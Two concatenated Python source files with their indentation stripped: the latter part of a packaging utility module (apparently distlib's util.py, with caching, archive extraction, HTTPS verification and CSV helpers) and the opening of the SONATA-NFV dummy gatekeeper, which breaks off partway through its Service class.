self, path, optimize=False, force=False, prefix=None, hashed_invalidation=False
):
dpath = cache_from_source(path, not optimize)
logger.info("Byte-compiling %s to %s", path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix) :]
compile_kwargs = {}
if hashed_invalidation and hasattr(py_compile, "PycInvalidationMode"):
compile_kwargs[
"invalidation_mode"
] = py_compile.PycInvalidationMode.CHECKED_HASH
py_compile.compile(
path, dpath, diagpath, True, **compile_kwargs
) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug("Removing directory tree at %s", path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = "link"
else:
s = "file"
logger.debug("Removing %s %s", s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ["__pycache__"]
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split(".")
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self): # pragma: no cover
return "<ExportEntry %s = %s:%s %s>" % (
self.name,
self.prefix,
self.suffix,
self.flags,
)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (
self.name == other.name
and self.prefix == other.prefix
and self.suffix == other.suffix
and self.flags == other.flags
)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(
r"""(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>[\w-]+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
""",
re.VERBOSE,
)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
else:
d = m.groupdict()
name = d["name"]
path = d["callable"]
colons = path.count(":")
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException("Invalid specification " "'%s'" % specification)
prefix, suffix = path.split(":")
flags = d["flags"]
if flags is None:
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(",")]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = ".distlib"
if os.name == "nt" and "LOCALAPPDATA" in os.environ:
result = os.path.expandvars("$localappdata")
else:
# Assume posix, or old Windows
result = os.path.expanduser("~")
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning("Directory exists but is not writable: %s", result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning("Unable to create %s", result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning("Default location unusable, using %s", result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(":", "---")
p = p.replace(os.sep, "--")
return d + p + ".cache"
def ensure_slash(s):
if not s.endswith("/"):
return s + "/"
return s
def parse_credentials(netloc):
username = password = None
if "@" in netloc:
prefix, netloc = netloc.rsplit("@", 1)
if ":" not in prefix:
username = prefix
else:
username, password = prefix.split(":", 1)
if username:
username = unquote(username)
if password:
password = unquote(password)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile(
"([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-" "([a-z0-9_.+-]+)", re.I
)
PYTHON_VERSION = re.compile(r"-py(\d\.?\d?)")
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
filename = unquote(filename).replace(" ", "-")
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[: m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r"\b", filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1 :], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r"(?P<name>[\w .-]+)\s*" r"\(\s*(?P<ver>[^\s)]+)\)$")
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException("Ill-formed name/version string: '%s'" % p)
d = m.groupdict()
return d["name"].strip().lower(), d["ver"]
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if "*" in requested:
requested.remove("*")
result |= available
for r in requested:
if r == "-":
result.add(r)
elif r.startswith("-"):
unwanted = r[1:]
if unwanted not in available:
logger.warning("undeclared extra: %s" % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning("undeclared extra: %s" % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get("Content-Type")
if not ct.startswith("application/json"):
logger.debug("Unexpected response for JSON request: %s", ct)
else:
reader = codecs.getreader("utf-8")(resp)
# data = reader.read().decode('utf-8')
# result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception("Failed to get external data for %s: %s", url, e)
return result
_external_data_base_url = "https://www.red-dove.com/pypi/projects/"
def get_project_data(name):
url = "%s/%s/project.json" % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = "%s/%s/package-%s.json" % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base): # pragma: no cover
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning("Directory '%s' is not private", base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError("No subscribers: %r" % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception("Exception during event publication")
value = None
result.append(value)
logger.debug(
"publish %s: args = %s, kwargs = %s, result = %s",
event,
args,
kwargs,
result,
)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of anything" % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of %r" % (succ, pred))
def is_step(self, step):
return step in self._preds or step in self._succs or step in self._nodes
def get_steps(self, final):
if not self.is_step(final):
raise ValueError("Unknown: %r" % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
# http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node], lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node], index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node:
break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ["digraph G {"]
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(" %s -> %s;" % (pred, succ))
for node in self._nodes:
result.append(" %s;" % node)
result.append("}")
return "\n".join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = (".tar.gz", ".tar.bz2", ".tar", ".zip", ".tgz", ".tbz", ".whl")
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode("utf-8")
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError("path outside destination: %r" % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith((".zip", ".whl")):
format = "zip"
elif archive_filename.endswith((".tar.gz", ".tgz")):
format = "tgz"
mode = "r:gz"
elif archive_filename.endswith((".tar.bz2", ".tbz")):
format = "tbz"
mode = "r:bz2"
elif archive_filename.endswith(".tar"):
format = "tar"
mode = "r"
else: # pragma: no cover
raise ValueError("Unknown format for %r" % archive_filename)
try:
if format == "zip":
archive = ZipFile(archive_filename, "r")
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != "zip" and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode("utf-8")
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ("", "K", "M", "G", "T", "P")
class Progress(object):
unknown = "UNKNOWN"
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = "100 %"
elif self.max is None:
result = " ?? %"
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = "%3d %%" % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = "??:??:??"
# elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime("%H:%M:%S", time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = "Done"
t = self.elapsed
# import pdb; pdb.set_trace()
else:
prefix = "ETA "
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
# import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return "%s: %s" % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return "%d %sB/s" % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r"\{([^}]*)\}")
_CHECK_RECURSIVE_GLOB = re.compile(r"[^/\\,{]\*\*|\*\*[^/\\,}]")
_CHECK_MISMATCH_SET = re.compile(r"^[^{]*\}|\{[^}]*$")
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(","):
for path in _iglob("".join((prefix, item, suffix))):
yield path
else:
if "**" not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split("**", 1)
if prefix == "":
prefix = "."
if radical == "":
radical = "*"
else:
# we support both
radical = radical.lstrip("/")
radical = radical.lstrip("\\")
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
if ssl:
from .compat import (
HTTPSHandler as BaseHTTPSHandler,
match_hostname,
CertificateError,
)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, "_tunnel_host", False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, "SSLContext"):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(
sock,
self.key_file,
self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs,
)
else: # pragma: no cover
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(ssl, "OP_NO_SSLv2"):
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, "HAS_SNI", False):
kwargs["server_hostname"] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug("Host verified: %s", self.host)
except CertificateError: # pragma: no cover
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if "certificate verify failed" in str(e.reason):
raise CertificateError(
"Unable to verify server certificate " "for %s" % req.host
)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError(
"Unexpected HTTP request on what should be a secure "
"connection: %s" % req
)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs["timeout"] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None, **kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop("timeout", None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get("use_datetime", 0)
if scheme == "https":
tcls = SafeTransport
else:
tcls = Transport
kwargs["transport"] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += "b"
else:
kwargs["newline"] = ""
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs["encoding"] = "utf-8"
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
"delimiter": str(","), # The strs are used because we need native
"quotechar": str('"'), # str in the csv API (2.x won't take
"lineterminator": str("\n"), # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if "stream" in kwargs:
stream = kwargs["stream"]
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs["path"], "r")
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode("utf-8")
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, "w")
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode("utf-8")
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters["inc"] = "inc_convert"
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if "()" in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop("()")
if not callable(c):
c = self.resolve(c)
props = config.pop(".", None)
# Check for valid identifiers
args = config.pop("[]", ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and "()" in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, "r", encoding="utf-8") as f:
result = json.load(f)
return result
class SubprocessMixin(object):
"""
Mixin for running subprocesses and capturing their output
"""
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write(".")
else:
sys.stderr.write(s.decode("utf-8"))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs
)
t1 = threading.Thread(target=self.reader, args=(p.stdout, "stdout"))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, "stderr"))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress("done.", "main")
elif self.verbose:
sys.stderr.write("done.\n")
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub("[-_.]+", "-", name).lower()
|
dummygatekeeper.py
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import os
import uuid
import hashlib
import zipfile
import yaml
import threading
from docker import DockerClient
from flask import Flask, request
import flask_restful as fr
from collections import defaultdict
import pkg_resources
from subprocess import Popen
from random import randint
import ipaddress
import copy
import time
from functools import reduce
logging.basicConfig()
LOG = logging.getLogger("sonata-dummy-gatekeeper")
LOG.setLevel(logging.DEBUG)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
GK_STORAGE = "/tmp/son-dummy-gk/"
UPLOAD_FOLDER = os.path.join(GK_STORAGE, "uploads/")
CATALOG_FOLDER = os.path.join(GK_STORAGE, "catalog/")
# Enable Dockerfile build functionality
BUILD_DOCKERFILE = False
# flag to indicate that we run without the emulator (only the bare API for
# integration testing)
GK_STANDALONE_MODE = False
# should a new version of an image be pulled even if its available
FORCE_PULL = False
# Automatically deploy SAPs (endpoints) of the service as new containers
# Attention: This is not a configuration switch but a global variable!
# Don't change its default value.
DEPLOY_SAP = False
# flag to indicate if we use bidirectional forwarding rules in the
# automatic chaining process
BIDIRECTIONAL_CHAIN = False
# override the management interfaces in the descriptors with default
# docker0 interfaces in the containers
USE_DOCKER_MGMT = False
# automatically deploy uploaded packages (no need to execute son-access
# deploy --latest separately)
AUTO_DEPLOY = False
# and also automatically terminate any other running services
AUTO_DELETE = False
def generate_subnets(prefix, base, subnet_size=50, mask=24):
# Generate a list of ipaddress in subnets
r = list()
for net in range(base, base + subnet_size):
subnet = "{0}.{1}.0/{2}".format(prefix, net, mask)
r.append(ipaddress.ip_network(unicode(subnet)))
return r
# private subnet definitions for the generated interfaces
# 10.10.xxx.0/24
SAP_SUBNETS = generate_subnets('10.10', 0, subnet_size=50, mask=30)
# 10.20.xxx.0/30
ELAN_SUBNETS = generate_subnets('10.20', 0, subnet_size=50, mask=24)
# 10.30.xxx.0/30
ELINE_SUBNETS = generate_subnets('10.30', 0, subnet_size=50, mask=30)
# path to the VNFD for the SAP VNF that is deployed as internal SAP point
SAP_VNFD = None
# Time in seconds to wait for vnf stop scripts to execute fully
VNF_STOP_WAIT_TIME = 5
class Gatekeeper(object):
def __init__(self):
self.services = dict()
self.dcs = dict()
self.net = None
# used to generate short names for VNFs (Mininet limitation)
self.vnf_counter = 0
LOG.info("Create SONATA dummy gatekeeper.")
def register_service_package(self, service_uuid, service):
"""
register new service package
:param service_uuid
:param service object
"""
self.services[service_uuid] = service
# lets perform all steps needed to onboard the service
service.onboard()
def get_next_vnf_name(self):
self.vnf_counter += 1
return "vnf%d" % self.vnf_counter
class Service(object):
"""
This class represents a NS uploaded as a *.son package to the
dummy gatekeeper.
Can have multiple running instances of this service.
"""
def __init__(self,
service_uuid,
package_file_hash,
package_file_path):
self.uuid = service_uuid
self.package_file_hash = package_file_hash
self.package_file_path = package_file_path
self.package_content_path = os.path.join(
CATALOG_FOLDER, "services/%s" % self.uuid)
self.manifest = None
self.nsd = None
self.vnfds = dict()
self.saps = dict()
self.saps_ext = list()
self.saps_int = list()
self.local_docker_files = dict()
self.remote_docker_image_urls = dict()
self.instances = dict()
# dict to find the vnf_name for any vnf id
self.vnf_id2vnf_name = dict()
def onboard(self):
"""
Do all steps to prepare this service to be instantiated
:return:
"""
# 1. extract the contents of the package and store them in our catalog
self._unpack_service_package()
# 2. read in all descriptor files
